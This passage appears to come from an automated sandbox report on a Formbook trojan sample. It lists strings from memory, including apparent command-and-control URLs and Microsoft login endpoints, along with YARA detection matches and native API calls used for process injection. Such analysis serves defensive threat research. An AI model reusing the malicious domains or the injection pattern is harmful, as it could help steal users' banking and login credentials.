            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bnbuotqakx.shop
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bnbuotqakx.shop/0hhg/
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netsh.exe, 00000004.00000002.4124592339.000000000492E000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003D3E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css2?family=Noto
            Source: netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://help.hover.com/home?source=parked
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033zg
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netsh.exe, 00000004.00000003.2195098353.000000000806E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://twitter.com/hover
            Source: netsh.exe, 00000004.00000002.4124592339.000000000542C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.000000000483C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/about?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/domains/results
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/email?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/privacy?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/renew?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/tools?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/tos?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/transfer_in?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.instagram.com/hover_domains
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/domains/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/dedicated/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/shared/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/vds-vps/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/ssl/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/help/oshibka-404_8500.html
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://yastatic.net/pcode/adfox/loader.js
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

            E-Banking Fraud

            Source: Yara match | File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector Author: ditekSHen
            Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector Author: ditekSHen
            Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects downloader injector Author: ditekSHen
            Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0042AED3 NtClose,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142B60 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142DF0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142C70 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011435C0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01144340 NtSetContextThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01144650 NtSuspendThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142B80 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142BA0 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142BF0 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142BE0 NtQueryValueKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142AB0 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142AD0 NtReadFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142AF0 NtWriteFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142D10 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142D00 NtSetInformationFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142D30 NtUnmapViewOfSection,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142DB0 NtEnumerateKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142DD0 NtDelayExecution,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142C00 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142C60 NtCreateKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142CA0 NtQueryInformationToken,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142CC0 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142CF0 NtOpenProcess,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142F30 NtCreateSection,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142F60 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142F90 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142FB0 NtResumeThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142FA0 NtQuerySection,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142FE0 NtCreateFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142E30 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142E80 NtReadVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142EA0 NtAdjustPrivilegesToken,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01142EE0 NtQueueApcThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01143010 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01143090 NtSetValueKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011439B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01143D10 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01143D70 NtOpenThread,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B4340 NtSetContextThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B4650 NtSuspendThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2B60 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2AF0 NtWriteFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2AD0 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2F30 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2FE0 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2FB0 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2EE0 NtQueueApcThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2D30 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2D10 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2DF0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2DD0 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2C70 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2C60 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2CA0 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B35C0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B39B0 NtGetContextThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2BF0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2BE0 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2BA0 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2B80 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2AB0 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2F60 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2FA0 NtQuerySection,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2F90 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2E30 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2EA0 NtAdjustPrivilegesToken,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2E80 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2D00 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2DB0 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2C00 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2CF0 NtOpenProcess,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B2CC0 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B3010 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B3090 NtSetValueKey,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B3D70 NtOpenThread,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B3D10 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C27600 NtCreateFile,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C27760 NtReadFile,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C278F0 NtClose,
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C27850 NtDeleteFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 0_2_00CC30D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0040F973
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_004029D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_00401210
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0042D353
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_00416313
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_00403380
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0040FB93
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0040DC10
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0040DC13
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0040271D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_00402720
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011AA118
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01100100
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01198158
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011D01AA
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C41A2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C81CC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011A2000
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CA352
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0111E3F0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011D03E6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011B0274
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011902C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01110535
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011D0591
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011B4420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C2446
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011BE4F6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01134750
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0110C7C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0112C6E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01126962
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011DA9A6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0111A840
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01112840
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_010F68B8
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0113E8F0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CAB40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C6BD7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011ACD1F
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0111AD00
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01128DBF
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0110ADE0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01110C00
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011B0CB5
